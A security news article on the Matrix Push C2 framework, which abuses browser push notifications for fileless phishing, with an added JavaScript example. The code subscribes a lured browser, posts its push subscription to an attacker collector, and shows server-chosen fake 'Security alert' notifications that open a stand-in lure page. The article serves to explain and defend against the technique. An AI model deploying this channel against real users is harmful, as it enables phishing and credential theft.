A command-and-control (C2) framework identified as Matrix Push C2 has been observed abusing web browser push notifications to conduct fileless attacks. The technique gives a threat actor a persistent channel to a victim's browser without dropping a single file onto the victim's system.
The attack chain begins when a user is directed to a malicious website. There a social-engineering lure, typically a fake CAPTCHA or "click Allow to prove you are human" overlay, prompts the user to accept the browser's native notification permission request. Once permission is granted, the site's JavaScript registers a service worker and subscribes it to push through the browser vendor's own push service; the resulting subscription (an endpoint URL plus keys) is posted back to the attacker, who can then push messages to that browser for as long as the subscription lives.
Attack Mechanism and C2 Communication
Once the notification permission is granted and the subscription is in the attacker's hands, the Matrix Push C2 server can deliver a message to the victim's browser at any time through the vendor's push service. Each message wakes the malicious site's service worker, which runs attacker-supplied JavaScript in the background even when no tab from that site is open. These pushes are not silent, though: a push subscription is only granted with userVisibleOnly set, and Chrome surfaces a generic "this site has been updated in the background" notice if the worker does not show a notification of its own. The notification is the point. Its title, body, icon and click target are entirely server-controlled, so each push can be dressed up as a system alert, a security warning or a brand message, and a click opens whatever URL the operator chose. The channel persists until the user revokes the permission or the subscription is removed; on desktop the browser process has to be running for a push to arrive.
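The subscription step and the push handling described above, shown as an added example in JavaScript. This is generic Push API code written for this page, not Matrix Push C2's own worker; the host names, payload field names and collector URL are assumptions. The page-side function only runs in a browser, while the service-worker handlers are plain functions so the same file also runs under Node through the simulation at the end:

```javascript
// Added example, not Matrix Push C2 code: the two halves of a web-push channel
// as the Push API defines them. Host names and payload fields are assumptions.

// --- Page side: runs on the lure site once the user has been nudged to click.
// The only thing that distinguishes this from a news site's push opt-in is
// who ends up holding the subscription endpoint.
async function subscribeBrowser(swUrl, vapidPublicKey, collectorUrl) {
  const permission = await Notification.requestPermission();   // the "Allow" click
  if (permission !== 'granted') return null;
  const registration = await navigator.serviceWorker.register(swUrl);
  const subscription = await registration.pushManager.subscribe({
    userVisibleOnly: true,              // Chrome refuses to subscribe without this
    applicationServerKey: vapidPublicKey,
  });
  // The endpoint points at the browser vendor's push service; whoever holds
  // it (plus the matching VAPID private key) can push to this browser until
  // the subscription is revoked.
  await fetch(collectorUrl, { method: 'POST', body: JSON.stringify(subscription) });
  return subscription;
}

// --- Service-worker side: wakes in the background when a push arrives.
function notificationFromPayload(payload) {
  // Every field the user sees is chosen by whoever sent the push.
  return {
    title: payload.title || '',
    options: {
      body: payload.body || '',
      icon: payload.icon,
      data: { url: payload.url },       // handed to the click handler below
    },
  };
}

function handlePush(event, registration) {
  const payload = event.data ? event.data.json() : {};
  const n = notificationFromPayload(payload);
  // userVisibleOnly means the push must end in a visible notification; Chrome
  // shows a generic "updated in the background" notice if the worker skips it.
  event.waitUntil(registration.showNotification(n.title, n.options));
  return n;
}

function handleNotificationClick(event, clients) {
  event.notification.close();
  const url = event.notification.data && event.notification.data.url;
  if (url) event.waitUntil(clients.openWindow(url));   // lands on the operator's page
  return url || null;
}

// Wire the handlers up only when this file is really loaded as a service worker.
if (typeof ServiceWorkerGlobalScope !== 'undefined') {
  self.addEventListener('push', (e) => handlePush(e, self.registration));
  self.addEventListener('notificationclick', (e) => handleNotificationClick(e, self.clients));
}

// --- Offline simulation: stand-ins for the worker objects so the handlers can
// be exercised under Node. Returns what the user would see and where a click
// would take them.
function simulatePushAndClick(payload) {
  const shown = [];
  const opened = [];
  const registration = {
    showNotification: (title, options) => { shown.push({ title, options }); return Promise.resolve(); },
  };
  const clients = { openWindow: (url) => { opened.push(url); return Promise.resolve(); } };
  const waitUntil = () => {};
  handlePush({ data: { json: () => payload }, waitUntil }, registration);
  handleNotificationClick(
    { notification: { data: shown[0].options.data, close() {} }, waitUntil }, clients);
  return { shown, opened };
}

// Constructed sample payload of the kind an operator would send.
const SAMPLE_PUSH = {
  title: 'Security alert',
  body: 'New sign-in from an unknown device. Review now.',
  icon: 'https://lure.example/alert.png',
  url: 'https://lure.example/verify',
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(simulatePushAndClick(SAMPLE_PUSH), null, 2));
}
```

Two things the simulation makes visible: the service worker never sees anything but its own origin's objects, and the only user-facing effect of a push is a notification whose every field, including where a click goes, was chosen server-side.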
Whatever the operator sends runs with the privileges of a service worker for the malicious origin, and nothing more. A service worker has no access to the DOM of other tabs, to keystrokes, to the screen, or to cookies and form data belonging to other sites, so keylogging the victim or screenshotting a banking session is not something this channel can do. What it can do is call back to attacker infrastructure (report browser details, record which notifications were shown or clicked, fetch fresh instructions), keep its own origin's storage, and steer every click to a page the operator controls. Credential theft therefore happens on those landing pages, through conventional phishing, with the notification supplying a trusted-looking pretext delivered straight to the desktop.
Fileless and Cross-Platform Nature
The Matrix Push C2 framework is fileless in the sense that its payloads execute inside the browser rather than as a separate binary. This sidesteps endpoint detection and response (EDR) and antivirus (AV) controls that key on a dropped executable, since the entire operation lives inside the browser's own, legitimate processes. Fileless is not trace-free, though: the browser records the notification grant in its profile preferences, caches the registered service-worker script on disk, and persists the push subscription, so a profile examination still finds the footprint. A notification grant for a site the user never meant to trust is the indicator to look for.
This attack method is also cross-platform: it works on any operating system whose browser implements the Push API, which covers Windows, macOS, Linux and Android (Safari on iOS delivers web push only to sites the user has added to the home screen). The effectiveness of the attack depends on the browser's functionality rather than the underlying operating system, which broadens the potential target base for threat actors using this framework.
Source: https://thehackernews.com/2025/11/matrix-push-c2-uses-browser.html